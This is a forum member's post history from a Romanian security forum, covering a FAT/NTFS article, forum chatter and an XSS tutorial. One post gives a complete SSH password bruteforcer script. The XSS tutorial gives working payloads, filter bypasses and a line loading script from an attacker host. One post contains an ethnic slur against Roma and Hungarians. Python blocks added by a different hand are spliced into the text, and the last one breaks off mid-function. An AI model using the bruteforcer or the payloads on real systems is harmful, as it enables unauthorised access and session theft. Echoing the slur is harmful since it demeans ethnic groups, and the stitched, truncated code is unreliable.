Nytro

Everything posted by Nytro

  1. I don't have any PSD, not even a PNG with the shield, I have nothing... I think a new one would be better, I think you could make something nicer.
  2. I think the time has come for the forum header to be changed: 1) We no longer have 20k members 2) It's Christmas 3) The new year is coming, let it find us with a new, holiday header. The problem is that we on the staff either aren't very skilled at this or don't have the time and patience needed to make such a header. So, who could make a new one? Whoever could make a nice one, meaning someone who knows at least somewhat what they're doing, if they want to make one, post it here. And we'll discuss what's good, what isn't, what should be changed. We'll see. A few ideas: I like the shield idea, something related to "security" would be nice, maybe a shellcode or a small piece of code in language xxx; it's Christmas, so there absolutely has to be a Santa girl, or two or three... I think you'll manage, you have more imagination than me. Good luck.
  3. Ugly, a "blue" Christmas... But I like the shield at the top.
  4. 300 max. OK, 500 since it's Christmas. Let's be realistic.
  5. Yes, "patriotic" people... That's how 98% of Romanians are. Romania is the way it is because of the anti-Romanian mentality.
  6. Basic Guide to FAT vs. NTFS
    Windows XP offers choices of File Systems... by Tom Bair

    Besides being the first Microsoft OS (Operating System) to feature an integrated Windows NT and Windows 98 kernel (the core program code of an OS), Windows XP Home Edition is also the first time home users have had the option to use the NTFS (New Technology File System). The File System provides a foundation for storing data on a hard drive. Understanding the strengths and weaknesses of each File System can help you in choosing which one is best for you.

    What Is A File System?
    There is more than one way to store information on your hard drive. In addition to NTFS, XP supports the FAT-16 (16-bit File Allocation Table) and the FAT-32 (32-bit File Allocation Table) file systems. Both versions of FAT are simpler and more direct than NTFS but not as reliable or secure. Due to its reliability and security, NTFS has long been the file system of choice in business environments. With NTFS, system administrators can exercise some control over what users do on a workstation. And when problems occur, NTFS is better able to recover without losing data. FAT has traditionally been the file system of choice for personal or home computers. Yet with the inclusion of NTFS support in Windows XP, significant numbers of home users are making the switch to enjoy the extra security and reliability NTFS provides.

    File System Compatibility
    File System compatibility becomes important if you plan to install more than one OS. In order to install more than one OS, you'll need to partition your hard drive. Windows treats each logical partition as a separate drive and each can contain its own File System.

    In general, systems that can support NTFS also support FAT: Windows NT, Windows 2000, Windows XP Home and Pro. Older consumer versions of Windows only support FAT: Windows 95, Windows 98, Windows 98 Second Edition, Windows ME. This means Windows ME installed on a FAT partition can't access data stored in an NTFS partition. XP, on the other hand, can read and write data from both NTFS partitions and FAT partitions. Note that WinNT does have some compatibility problems with newer versions of both FAT and NTFS. Although WinNT supports the older FAT16 file system, it does not support FAT32. WinNT also has NTFS problems. Unless you have Service Pack 4 installed, you won't be able to read the new NTFS 5.0 partitions that Windows 2000 and Windows XP use.

    Understanding A File System
    Before we discuss FAT and NTFS in detail, let's cover a few basics for those of us who are less informed. Both types of file systems divide data into units called clusters. Each cluster can only hold one file, yet one file may span several clusters; any empty space left in the last cluster remains vacant. Smaller cluster sizes are more efficient from a storage perspective (they make for less leftover space), but they're less efficient in terms of performance. Larger clusters can hold more data, which means less work for the PC and slightly better performance. Cluster size also plays a role in deciding how large a hard drive a system can support. Overall, cluster size increases with available hard drive space. On a newly installed system, related clusters are stored close together. As time passes, however, these clusters can become fragmented and find themselves scattered all over the hard drive. Most versions of Windows include Disk Defragmenter, a utility that examines data in each cluster and reorganizes it so related clusters are placed closer together on the hard drive. Fragmentation is a problem for both FAT and NTFS partitions.

    ---------------Cluster Chart---------------
    Smaller clusters can squeeze more data onto a drive, but larger clusters provide better performance. Generally, 4KB clusters provide a nice balance between performance and storage efficiency. Below are the default cluster sizes for FAT16, FAT32, and NTFS under Windows XP.

    Partition Size...........Cluster Size
    FAT16
    16MB - 127MB................2KB
    128MB - 255MB..............4KB
    256MB - 511MB..............8KB
    512MB - 1,023MB...........16KB
    1,024MB - 2,048MB........32KB
    2,048MB - 4,096MB........64KB
    FAT32
    512MB - 8,191MB..........4KB
    8,192MB - 16,383MB.....8KB
    16,384MB - 32,767MB...16KB
    32,767MB+..................32KB
    NTFS
    0MB - 512MB..............512 bytes
    513MB - 1,024MB........1KB
    1,025MB - 2,048MB.....2KB
    2,049MB+..................4KB

    Facts On FAT
    The most basic Windows file system is known as FAT. It gets its name from the file allocation table stored near the beginning of the drive. The FAT keeps track of every file saved on its drive or partition. When you save data or a file to the hard drive, the system consults the FAT to find empty clusters. After it saves the information, it modifies the FAT to reflect the name of the file saved and the clusters it saved the file to. When opening the document, the system searches through the FAT for the file name, finds the associated clusters where the file is stored, and reads the information contained in those clusters. As I stated earlier, there are two primary varieties of FAT. FAT16, or 16-bit FAT, has been around for many years. Then FAT32, or 32-bit FAT, replaced FAT16.

    FAT16. FAT16 is a 16-bit file system because it identifies clusters with names that are 16 bits (or digits) long. There are quite a few possible combinations with 16 slots to work with, but there is a limit. Because FAT cluster sizes vary depending on how much drive space the system needs to catalog with its range of available names, and because FAT16 can't support as many clusters as FAT32, it needs larger clusters to cover the same amount of space. To format an entire 1GB partition, as an example, FAT16 clusters must expand to roughly 32KB, which is too large for efficient storage. XP supports FAT16 clusters up to 64KB in size. Given that FAT16 can only support 65,536 clusters, you can't use FAT16 on a partition larger than 4GB. Of course, 64KB clusters are extremely inefficient. About the only thing using FAT16 today is floppy drives and their 1.44MB disks.

    FAT32. FAT32 made its first appearance in Windows 95 OSR2 (Original equipment manufacturer Service Release 2; a version of Windows 95 made available exclusively to manufacturers and never sold at retail). Windows 98 was the first retail version of Windows to include support for FAT32. Because FAT32 is a 32-bit file system, it can address more clusters than FAT16. As a result, FAT32 can use smaller clusters for better storage efficiency. It can also support larger partitions, up to 8TB (terabytes) in size. FAT32 was made compatible (as much as possible) with FAT16, but some changes were made behind the scenes. As a result, some software, such as older drive utilities, will not work on hard drives using FAT32 file systems. Hard drive compression utilities, such as DriveSpace and DriveSpace 3, are incompatible with FAT32.

    NTFS
    For several years now NTFS has been well known for its security and reliability. Windows XP Home Edition marks the first time home users get to use this more robust file system. However, there's more to NTFS than just laying out data on a hard drive.

    Master File Table
    If NTFS had anything in common with FAT, it would be the MFT (Master File Table). The MFT is very close to the file allocation table in FAT, only much more complicated. The MFT stores file attributes for every file stored on the NTFS partition. File attributes describe everything there is to know about a file. In NTFS, even the data contained in a file is a file attribute. Additional file attributes include the file's name, location, and security information. When possible, NTFS stores all the file attributes, including the file's data, in the MFT. Often there is not enough room to accommodate all the attributes in the MFT, so the data attribute will be moved outside the MFT, and a pointer will direct the system to all the clusters containing the data attribute of the file. The system can then retrieve the data.

    Metadata
    The MFT is known as a metadata file. Metadata is essentially data about data. NTFS uses metadata files to manage data on the partition. Some of the more important metadata files include the MFT Mirror, Log File, Cluster Allocation Bitmap, Bad Cluster File, and Quota Table. It's pretty easy to figure out that the MFT Mirror is just a backup copy of the MFT. NTFS stores the MFT at the beginning of a hard drive's platter, and places the MFT Mirror in the middle of the platter. If the original MFT becomes damaged, the MFT Mirror will provide the necessary information to recover data on the system. The Log File, also known as the Change Log Journal, records changes made to the file system. The Log File only records actions taken, not the data which is modified. In other words, it can tell you when Windows writes a document to the file system but not what data the document contained. The Log File is useful to anti-virus programs, backup utilities, and other applications which have an interest in knowing when changes occur to the file system. The Cluster Allocation Bitmap is a map of the partition. The system uses the information contained in the Cluster Allocation Bitmap to locate available clusters to write new data to. The Bad Cluster File is similar, but it marks sections of the hard drive that have gone bad, and the system will not store data in these marked clusters. The Quota Table is a feature new in Windows 2000 and Windows XP. Using quotas, you are able to control how much hard drive space a directory and its subdirectories (folders and subfolders) can use. It allows you to control how other users on the PC utilize hard drive space. This will allow you to limit just how much storage space your son can consume for his mp3 files, or keep a family member from stocking up three years' worth of e-mail messages.

    Smaller Clusters
    Since NTFS can support more clusters than FAT32, the result is that NTFS clusters are generally smaller and more efficient. XP and 2K have a default cluster size of 4KB. But if you are converting a FAT file system to NTFS, you will have 512-byte clusters. This may cause you to have a slight performance hit.

    NTFS Security
    Support for file and directory permissions is one of the major benefits of using NTFS. This security feature ensures that only certain users have access to specific files and directories. For example, you can grant Bill complete access to a directory, while preventing Mary from ever seeing its contents. The security for Windows XP Home Edition is a bit different: NTFS only provides what is known as simplified security. Provided you have set up multiple password-protected user accounts, you can mark certain directories as private. Other users won't have access to your private directories. The information about file and directory permissions is stored in the Security Descriptor file attribute. When you try to access a file, XP will look at who is logged on, then compare that information to the information in the Security Descriptor file attribute for the file. If it finds you have permission to access the file, it will look up the location of the clusters containing the file and open it for you. If you don't have permission to access the file, XP will let you know.

    Which File System Is For You?
    When you install XP, you will have to decide whether to install NTFS or FAT32. FAT32 is most useful on multi-boot machines (PCs with more than one OS installed that let you choose which OS you want each time you boot) when file system compatibility is important. If you use a multi-boot computer and want to keep things simple, install Windows XP on a FAT32 partition. If you are like me and want to play with NTFS but still need to maintain some file system compatibility, you can install XP on an NTFS partition and create a separate FAT32 partition to use specifically for sharing documents between your multiple Operating Systems. If XP is going to be the only OS on your PC, try using NTFS. In most cases, NTFS will be the most efficient choice and it offers a range of advanced features which are not present in FAT32.

    Converting A File System
    If you have already installed your Windows XP on a FAT16 or FAT32 partition and now want to upgrade to NTFS, the convert.exe utility will let you do just that. To convert a partition:
    1. Click on the Start button.
    2. Highlight All Programs, Accessories, and click on Command Prompt.
    3. Type convert.exe c: /fs:ntfs. This will convert your C drive (replace "c" with the proper drive letter to convert another drive).
    4. XP will prompt you to enter a volume name. The name you enter will appear next to the drive in My Computer.
    5. If you specified the partition that has XP installed on it, the utility will ask if you want to convert the next time you boot the system. Click Yes and reboot.

    The conversion process will create the MFT and other metadata files in free space and won't overwrite any FAT clusters until the NTFS file system is in place. This means if you experience an error during the conversion process, the system should fall back to the FAT file system without losing any data. It also means that you'll need some free space to convert an existing FAT partition. The exact amount of free space required varies according to the size of the partition and the amount of data it contains. Please be aware that converting to NTFS is a one-way trip. Once the conversion is complete, the only way to return to a FAT file system is to reformat the hard drive, thereby destroying any existing data in the process.

    Author: Tom Bair
    Source: Security Forums :: View topic - [Tutorial] Basic Guide to FAT vs. NTFS
    Republished with the permission of the author and Security-Forums Dot Com.
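The FAT mechanics the article above describes (one file spanning several clusters, the slack left in the last cluster, FAT entries chaining cluster to cluster, fragmentation after deletes and re-writes, and the 65,536-cluster ceiling that bounds a FAT16 partition), as an added Python model. This is example code added here, not code from Tom Bair's article or from the post; the ToyFat class, its FREE and EOC markers, the cluster sizes and the sample files are all constructed for the illustration.

```python
"""Toy model of a file allocation table (added illustration, not the article's code).
Cluster sizes and sample files below are constructed for the example."""

FREE = 0x0000   # FAT entry: cluster is unallocated
EOC = 0xFFFF    # FAT entry: last cluster of a file's chain (FAT16 convention)


class ToyFat:
    """One FAT entry per cluster, holding FREE, the next cluster number, or EOC.
    The directory maps a file name to (first cluster, size in bytes)."""

    def __init__(self, cluster_count, cluster_size):
        self.cluster_size = cluster_size
        self.fat = [FREE] * cluster_count
        self.directory = {}

    def free_clusters(self):
        return [n for n, entry in enumerate(self.fat) if entry == FREE]

    def write_file(self, name, size):
        """Allocate ceil(size / cluster_size) clusters (at least one), chain them
        in the FAT and record the first cluster in the directory."""
        needed = max(1, -(-size // self.cluster_size))
        free = self.free_clusters()
        if len(free) < needed:
            raise OSError("disk full")
        chain = free[:needed]               # first-fit, like the article's "find empty clusters"
        for cur, nxt in zip(chain, chain[1:]):
            self.fat[cur] = nxt
        self.fat[chain[-1]] = EOC
        self.directory[name] = (chain[0], size)
        return chain

    def chain_of(self, name):
        """Follow the FAT from the directory entry until the EOC marker."""
        cluster, _ = self.directory[name]
        chain = []
        while True:
            chain.append(cluster)
            nxt = self.fat[cluster]
            if nxt == EOC:
                return chain
            if nxt == FREE or nxt in chain:     # dangling or looping chain
                raise ValueError(f"corrupt chain for {name!r}")
            cluster = nxt

    def delete_file(self, name):
        """Release the chain; the cluster contents themselves are not wiped."""
        for c in self.chain_of(name):
            self.fat[c] = FREE
        del self.directory[name]

    def slack_bytes(self, name):
        """Vacant space in the file's last cluster."""
        _, size = self.directory[name]
        used = size % self.cluster_size
        return 0 if used == 0 else self.cluster_size - used

    def fragments(self, name):
        """Number of runs of consecutive clusters (1 means unfragmented)."""
        chain = self.chain_of(name)
        return 1 + sum(1 for a, b in zip(chain, chain[1:]) if b != a + 1)


def fat16_max_partition(cluster_size):
    """FAT16 addresses at most 65,536 clusters, so that count times the
    cluster size bounds the partition (e.g. 64KB clusters -> 4GB)."""
    return 65536 * cluster_size


def demo():
    """Constructed scenario: write, delete, re-write, then inspect."""
    fs = ToyFat(cluster_count=16, cluster_size=4096)
    fs.write_file("a.txt", 10_000)   # clusters 0,1,2 with slack in cluster 2
    fs.write_file("b.txt", 4_096)    # cluster 3, exactly full
    fs.write_file("c.txt", 5_000)    # clusters 4,5
    fs.delete_file("b.txt")          # cluster 3 becomes free again
    fs.write_file("d.txt", 6_000)    # takes clusters 3 and 6: fragmented
    return fs


if __name__ == "__main__":
    fs = demo()
    for name in fs.directory:
        print(name, fs.chain_of(name), "slack:", fs.slack_bytes(name),
              "fragments:", fs.fragments(name))
```

The deleted file's clusters are only marked free, which is why "deleted" data is still recoverable from a FAT volume until those clusters are reused.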
  7. Nytro

    The porn topic

    For the thousandth time, stop posting here in Offtopic if the topic fits in other categories like REQUESTS or HELP. You have a problem, you need something specific? You do NOT post here. Read this: http://rstcenter.com/forum/28329-topicurile-de-la-offtopic.rst I'm tired of giving warnings for this.
  8. Honestly, I'm not going to read the whole article. In short: screw the gypsies and the Hungarians!
  9. What's the point of installing Linux if you want to play Counter? You use it very rarely, when you strictly need something and there is no Linux alternative.
  10. I listen to manele. If you make a Linux version maybe I'll use it.
  11. It's taken from BackTrack.

    #!/usr/bin/python
    import thread
    import time
    from threading import Thread
    import sys, os,threading, time, traceback, getopt
    import paramiko
    import terminal

    global adx
    global port

    adx="1"
    port=22
    data=[]
    i=[]

    term = terminal.TerminalController()
    paramiko.util.log_to_file('demo.log')

    print "\n*************************************"
    print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *"
    print "*Coded by Christian Martorella *"
    print "*Edge-Security Research *"
    print "*laramies@gmail.com *"
    print "*************************************\n"

    def usage():
        print "Usage: brutessh.py options \n"
        print " -h: destination host\n"
        print " -u: username to force\n"
        print " -d: password file \n"
        print " -t: threads (default 12, more could be bad)\n\n"
        print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n"
        sys.exit()

    class force(Thread):
        def __init__( self, name ):
            Thread.__init__(self)
            self.name = name

        def run(self):
            global adx
            if adx == "1":
                passw=self.name.split("\n")[0]
                t = paramiko.Transport(hostname)
                try:
                    t.start_client()
                except Exception:
                    x = 0
                try:
                    t.auth_password(username=username,password=passw)
                except Exception:
                    x = 0
                if t.is_authenticated():
                    print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL
                    t.close()
                    adx = "0"
                else:
                    print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL
                    t.close()
                time.sleep(0)
                i[0]=i[0]-1

    def test_thread(names):
        i.append(0)
        j=0
        while len(names):
            try:
                if i[0]<th:
                    n = names.pop(0)
                    i[0]=i[0]+1
                    thread=force(n)
                    thread.start()
                    j=j+1
            except KeyboardInterrupt:
                print "Attack suspended by user..\n"
                sys.exit()
        thread.join()

    def test(argv):
        global th
        global hostname
        global username
        th = 12
        if len(sys.argv) < 3:
            usage()
        try :
            opts, args = getopt.getopt(argv,"h:u:d:t:")
        except getopt.GetoptError:
            usage()
        for opt,arg in opts :
            if opt == '-u':
                username = arg
            elif opt == '-h':
                hostname =arg
            elif opt == '-d':
                password = arg
            elif opt == "-t":
                th = arg
        try:
            f = open(password, "r")
        except:
            print "Can't open password file\n"
            sys.exit()
        print term.RED + "HOST: " +term.NORMAL + hostname + term.RED + " Username: " +term.NORMAL + username +term.RED + " Password file: " +term.NORMAL+ password
        print "==========================================================================="
        print "Trying password...\n"
        name = f.readlines()
        starttime = time.clock()
        test_thread(name)
        stoptime = time.clock()
        print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime)
        print "\n"

    if __name__ == "__main__":
        try:
            test(sys.argv[1:])
        except KeyboardInterrupt:
            print "Attack suspended by user...\n"
            sys.exit()

    You'll manage. If you can't even use this one, give up on this kind of nonsense. (@ the "cardboard hackers")
  12. Hey, aren't you buying drinks? Happy birthday. :->
  13. OSSTMM - Open Source Security Testing Methodology Manual The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-reviewed methodology for performing security tests and metrics. The OSSTMM test cases are divided into five channels (sections) which collectively test: information and data controls, personnel security awareness levels, fraud and social engineering control levels, computer and telecommunications networks, wireless devices, mobile devices, physical security access controls, security processes, and physical locations such as buildings, perimeters, and military bases. The OSSTMM focuses on the technical details of exactly which items need to be tested, what to do before, during, and after a security test, and how to measure the results. New tests for international best practices, laws, regulations, and ethical concerns are regularly added and updated. Provided here is the latest public release. To receive OSSTMM development status, notes, and betas, become part of the team. Subscribe now to join the ISECOM Gold or Silver Team or contact us with how you can help OSSTMM development and earn a place on the core development team. Source: ISECOM - Making Sense of Security Download: http://www.isecom.org/mirror/OSSTMM.3.pdf
  14. Request: stop answering Krisler12™'s questions. He asks hundreds of them for nothing, just to have something to do.
  15. The program doesn't know how to handle redirects. The redirect can be nasty, from a simple HTTP header to some nasty JavaScript code. You put the link that the adf.ly link redirects to.
  16. Ban. Who's next?
  17. A 10/10 topic. Ban osyk.
  18. Desktop multi-core CPU hierarchy. Have you needed to buy a new processor and not known which model within your budget performs better? Have you needed an upgrade, but with how often the names change lately you no longer knew where to start? Now we can clear up the situation together, with the help of the table below, which tries to order all desktop multi-core processors in descending order of performance. It was built on the basis of tests from BeHardware, to which personal extrapolations, my own experience, and various reviews from the vastness of the Internet were added. I did not take single-core CPUs into account, because they are outdated today, rare in offers, and should no longer be on any of our shopping lists! If I omitted any model, or some CPUs are not positioned correctly, don't hesitate to tell me (with arguments). At the same time, by including as many characteristics as possible, I tried to convey an overview of the whole world of multi-core processors, which allows as fair a differentiation as possible of the many existing architectures. Price was not taken into account in making this ranking, because it is far too volatile a characteristic to be evaluated consistently. You can find the hierarchy here: Ierarhia CPU-urilor desktop multi core | Arena IT
  19. Only here on RST do I have a damn nasty password; elsewhere they're nothing special, I don't care if someone guesses them. So I don't think there's any point in using dynamic or very long passwords.
  20. I like it
  21. Shifting all the bits of that number written in hexadecimal 2 positions to the right. In other words, that number divided by 4 (2 to the power 2). At least that's what I assume, I don't know what that contest is about.
  22. XSS Tutorial - From Bug to Vulnerability First Revision [updated] - 2010 (no actual attack code is provided in this article) ___ -:: Introduction ::- ____________ What is XSS and what does it refer to? XSS aka Cross Site Scripting is a client-side attack where an attacker creates a malicious link, containing script- code which is then executed within the victim's browser. The script-code can be any language supported by the browser but mostly HTML and Javascript is used along with embedded Flash, Java or ActiveX. What can Cross Site Scripting be used for? Cross Site Scripting can be used for a variety of things, such as session-hijacking, browser attacks, phishing, propaganda and even worms! However it still requires the victim to click a malicious link created by the attacker or visit a malicious page that the attacker controls. How could One get a victim to click a XSS-link? The easiest way to get people to click malicious links is to make them look authentic and non- malicious. Giving them a reason afterwards is the social-engineering part which should be easy except if the victim is aware of such attacks and / or has measures against Cross Site Scripting, such as NoScript. How does One avoid XSS-links looking suspicious? This is typically done with encoding, short url services, redirects and even flash! Which types of Cross Site Scripting are there? The most common types are GET- and POST-based XSS. However Cross Site Scripting can also be triggered via cookies. Persistent and non-persistent XSS are defined by wether the script will remain and execute directly on the site (if f.ex. html or sql injection are used) or if the chosen script will have to be called with a malicious url each time it has to be executed. (non-persistent) What is the difference between GET- and POST-XSS? 
The difference is that when GET-variables is used it is possible to conduct normal XSS attacks where an attacker sends a malicious crafted URL to the victim which is then executed when the victim opens the link in the browser. With POST-variables an attacker could f.ex. use flash to send the victim to the POST-XSS vulnerable site since it is not possible to create an URL when POST-variables are in use. Are there sub-categories of Cross Site Scripting? At the moment there's XSSR and XSSQLI. One could say that XSRF/CSRF belongs to the same category, however the attack method differs too much from traditional Cross Site Scripting. XSSR or CSSR aka Cross Site Script Redirection is used to redirect a victim to another page unwillingly. The page can for example contain a phishing template, browser attack code or in some cases where the data or javascript URI scheme is used: session-hijacking. XSSQLI is a mix of Cross Site Scripting and SQL Injection, where an unknowing victim clicks a malicious link containing SQL Injection instructions for an area in the website which requires privileges that guests or members doesn't have. XSRF or CSRF (sometimes refered to as C-Surf) stands for Cross Site Request Forgery which is used to send input from a 3rd party site to the target site. XSRF can in some cases be triggered just by viewing a specially crafted image but the most commonly used are URLs. With Cross Site Request Forgery it might be possible to f.ex. alter the password of the victim if the target site is not secured properly with tokens etc. What is XST and can it be used for anything? XST also known as Cross Site (Script) Tracing is a way of abusing the HTTP Trace (Debug) protocol. Anything that an attacker sends to a web-server that has TRACE enabled will send the same answer back. If an attacker sends the following: TRACE / HTTP/1.0 Host: target.tld Custom-header: <script>alert(0)</script> Then the attacker will receive the same "Custom-header: <scr..." 
back allowing script execution. However after recent browser updates the following year(s) XST has been increasingly harder to control and execute properly. How is it possible to find XSS bugs within websites? There are 2 methods: code / script auditing or fuzzing which is described below. What kind of tools is required to find XSS bugs? (REQ = Required, OPT = Optional) - REQ: An Internet Browser (such as FireFox) in case you're fuzzing. - REQ: A text-viewer (such as notepad) in case you're auditing. - OPT: An intercepting proxy in case you're doing more advanced XSS. (In FireFox it is possible to use Tamper Data). - OPT: Browser Addons, for FireFox the following are especially useful: Firebug, JSView and LiveHTTP Headers. What else is useful to know if One wants to find XSS bugs? - Browser limitations regarding Cross Site Scripting [1] - HTTP Headers and how the HTTP protocol works. - HTML + Javascript and perhaps embedded script attacks. (flash etc.) - Intercepting proxies (Burp etc.), differential tools (meld, ExamDiff, etc.) - Useful browser-addons (see FireCat [3]) - Website scanners (Nikto, W3AF, Grendel, Directory-fuzzers etc.) Where are XSS-bugs typically located? It is usually located in user submitted input either via GET or POST variables, where it is reflected on the target site as text outside tags, inside tag values or within javascript. It can also in some cases be submitted via cookies, http headers or in rare cases file uploads. How does One protect a site against XSS? The best way is to ensure that all user input and output is validated properly. However in some cases an IPS or WAF can also protect against XSS though the best way is still to validate the user-input and -output properly. ___ -:: Finding the Bug - With Fuzzing ::- ____________ [EASY] Example Case - A: We're at hxxp://buggysite.tld where we see a "Search-field" in the top-right. 
Since we don't know the real source code but only the HTML-output of the site we will have to fuzz anything where it is possible to submit data. In some cases the data will be reflected on the site and in some cases it wont. If it doesn't we move on to the next cookie, header, get / post variable or whatever it is that we are fuzzing. The most effective way to fuzz is not to write: <script>alert(0)</script> since many sites has different precautions against Cross Site Scripting. Instead we create a custom string which in most cases wont trigger anything that might alter the output of the site or render error pages that aren't vulnerable. An example of an effective string could be: "keyword'/\>< " ' /\ > and < are the most commonly used html characters used in Cross Site Scripting. However if we want to be really thorough then we could also add )(][}{% to the string that we are using to fuzz the target site. The reason why there's not two of " or ' is because this can trigger a WAF, IPS or whatever precaution the site might have tried to implement against XSS instead of using a secure coding scheme /plan / development cycle. The reason why all characters are written as >< instead of <> is because this is a common bypass against XSS-filters! With that in mind, we use the following string: "haxxor'/\>< to fuzz the search-field: Lets take a look at the returned HTML-code: ... <input type="text" name="search" value=""haxxor'/\><" /> <br /> You searched for \"haxxor\'/\\>< which returned no results. ... As we can see the input tag encoded our fuzzing string correct, however the text afterwards did not encode it properly as it only added slashes which is completely useless against Cross Site Scripting in this case. By submitting the following string we can XSS their website: <script>alert(0)</script> or perhaps <script src=hxxp://h4x0r.tld/xss.js></script> Of course we don't know if the following characters : ( ) and . are filtered but in most cases they work. 
Our final XSS-url could be: hxxp://buggysite.tld/search.php?query=<script>alert(0)</script> if GET-variables are used. [EASY] Example Case - B: We're at hxxp://yetanothersite.tld where we see another search formular. The following is returned after our string is submitted to the search field: ... <input type="text" name="search" value="\"haxxor\'/\\><" /> <br /> You searched for "haxxor'/\>< which returned no results. ... In this case the string after the tag encoded the string properly, however the string inside the tag only had some slashes added which does nothing in this case. Basically we can bypass this easily with: "><script>alert(0)</script> If we're going to load external javascript we will have to avoid using " and ' of course. Our final XSS-url could be: hxxp://yetanothersite.tld/search.php?query="><script>alert(0)</script> if GET-variables are used. [MODERATE] Example Case - C: We're at hxxp://prettysecure.tld where we find yet another search field, it's time to submit our fuzzing string. The following HTML-code is returned after our string is submitted: ... <input type="text" name="search" value=""haxxor'/\><"> You searched for ""haxxor'/\><" which returned no results. ... (further down) <script> ... s.prop1="prettysecure"; s.prop2="\"haxxor%39/\%3E%3C"; s.prop3="adspace"; ... </script> For most people this might look secure but it really isn't. A lot of people also overlooks potential Cross Site Scripting vectors if their string <script>alert(0)</script> is either not output directly or encoded where they expect the XSS bug to be. This is why it is important to use a keyword that doesn't exist on the site, such as haxxor or something better. The reason why a keyword is used is because it is searchable almost always, you can call it a XSS-locator. [1] Anyway, back to our example. s.prop2="\"haxxor%39/\%3E%3C"; looks secure but the flaw is that backspace aka \ is not filtered or encoded correct. 
So if we write: \" it will become \\", which will escape the first \ but not our quote. As you can see, we can't use tags either so we'll have to do something else. We have of course checked that brackets ( ) are NOT filtered. (in some cases they can be). By entering the following string we are able to create an alert box: \"; alert(0); s.prop500=\" This will become: s.prop2=\\"; alert(0); s.prop500=\\" when we submit the string. The reason why we add the s.prop500=\" variable to our string is because the javascript will most likely NOT execute if we don't. We could also use comments so instead of s.prop500=\" we just use // in the end of the string. In this case it is also possible to execute external javascript if One uses a bit more advanced javascript. In order to do this we can use document.write(String.fromCharCode()); where you will need a decimal converter. Our final XSS-url could be: hxxp://prettysecure.tld/search.php?query=\"; alert(0); s.prop500=\" ___ -:: Finding the Bug - With Auditing ::- ____________ [EASY] Example Case - A: The following file (index.php) has some interesting code: ... if($_GET['view_profile']==1) { echo $_GET['name']; ... (more code) } ... By looking at the above code we can see that if view_profile is equal to 1 then the script prints the "name" variable. An example attack URL could look like: hxxp://testz.tld/index.php?view_profile=1&name=<script>alert(0)</script> [HARD] Example Case - B: The following file (search.php) has some interesting code: ... if($_GET['set_flag']==1) { $var = "checked"; } echo "<input type='radio' value='flag' checked='" .htmlentities($var). "' />"; ... This is a conditional vulnerability where register_globals in php.ini has to be set to On. (Off is factory default). Register_Globals basically allows an individual to set variables on the fly, even if they are not meant to be set. This only applies to variables that are NOT set as in the example above. 
Another problem we have encountered is htmlentities(); however, due to a coding error we can still abuse the tag without creating a new one. We will need to use event handlers in the <input> tag and some CSS (Cascading Style Sheets) to make sure that the victim triggers the event handler no matter what. There are multiple ways of doing that; one of them is:

style='display:block;width:99999px;height:99999px;'

An event handler we could use in this case is onmouseover, although onblur might be better.

You might ask yourself: why is the above script not secure? Because htmlentities() used that way is insecure. The tag looks like this in HTML form:

<input type='radio' value='flag' checked='$var' />

Inside the checked attribute our variable ($var) is encoded, but only ", > and < are encoded, not ', because ENT_QUOTES was not passed to htmlentities(). This means that we can break out of checked='' easily.

An example attack URL could be (the parameter name has to match the uninitialised variable, $var in the listing above):

hxxp://was-secure.tld/search.php?var=' style='display:block;width:99999px;height:99999px; ' onmouseover='alert(0)

There is no "Example Case - C", since I have gone through most of the important aspects of Cross Site Scripting.

___ -:: Additional Information ::- ____________

XSSR

When it is possible to send a user to the data: or javascript: URI scheme, either via A) GET or POST variables or B) user-submitted content such as a link, then the XSSR category applies to the bug. However, some individuals have claimed that a site that only accepts HTTP or HTTPS links via GET variables also falls under the XSSR category.

An example of XSSR could be:

hxxp://somesite.tld/redirect.php?link=data:text/html,<script>alert(0)</script>

And if the javascript: URI scheme is used:

hxxp://somesite.tld/redirect.php?link=javascript:alert(0);

This has in some cases been known to leak cookies and is therefore used in session hijacking.

XSSQLI

When a SQL Injection vulnerability exists within a privileged area of the target site, XSSQLI becomes usable.
An example of XSSQLI could be tricking the administrator of "shouldbesecure.tld" into clicking either the SQL Injection link directly, or a Cross Site Scripting link which contains a call to the SQL Injection in the privileged area of the site, where the vulnerable part could be:

hxxp://shouldbesecure.tld/admin.php?del=1 AND 1=1/*

XSRF

Also known as CSRF and C-Surf; it can be used against sites that don't use tokens, which are usually hidden inside tags. A common way to use tokens against C-Surf attacks is to hide them inside tags like:

<input type="hidden" name="anti-csrf" value="random token value" />

If the tokens are not random enough it might be possible to predict them and still use C-Surf in an attack.

All of the best,
MaXe - Founder of InterN0T

References:
[1] XSS (Cross Site Scripting) Cheat Sheet
[2] http://en.wikipedia....-site_scripting
[3] FireCAT 1.5 : Firefox Catalog of Auditing exTensions

Source: XSS Tutorial - From Bug to Vulnerability - r00tsecurity
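The two mistakes behind Case C and the audited Case B can be modelled in a few lines. The following is an added example (Python 3), not part of MaXe's tutorial: a filter that backslashes quotes but leaves backslashes alone, beside a correct encoder for a JavaScript string context, and the behaviour of htmlentities() without ENT_QUOTES beside the fixed call. The breakout check lexes the escaped text the way a JavaScript engine would. The payloads are the ones from the text (the JavaScript one in the // variant the text mentions); the function names are mine, and Python's html.escape() emits &#x27; where PHP would emit &#039;, which makes no difference to the result.

```python
import html
import json

# Payloads taken from the tutorial above (the JS one with the // variant it mentions).
JS_PAYLOAD = '\\"; alert(0); //'
ATTR_PAYLOAD = "' style='display:block;width:99999px;height:99999px;' onmouseover='alert(0)"


def naive_js_escape(value):
    """The Case C filter: a backslash in front of every quote, backslashes untouched.
    Writing \\" therefore yields \\\\" : the first backslash is escaped, the quote is not."""
    return value.replace('"', '\\"').replace("'", "\\'")


def safe_js_escape(value):
    """Correct encoding for a JS string literal: json.dumps escapes \\ and \" (and control
    chars); <, > and & are additionally hex-escaped so </script> cannot close the block."""
    body = json.dumps(value)[1:-1]
    return body.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def js_string_terminates_early(body):
    """Lex `body` as the inside of a double-quoted JS literal: a backslash consumes the
    next char, an unescaped double quote ends the literal, i.e. the attacker broke out."""
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 2
            continue
        if body[i] == '"':
            return True
        i += 1
    return False


def render_script(escaped):
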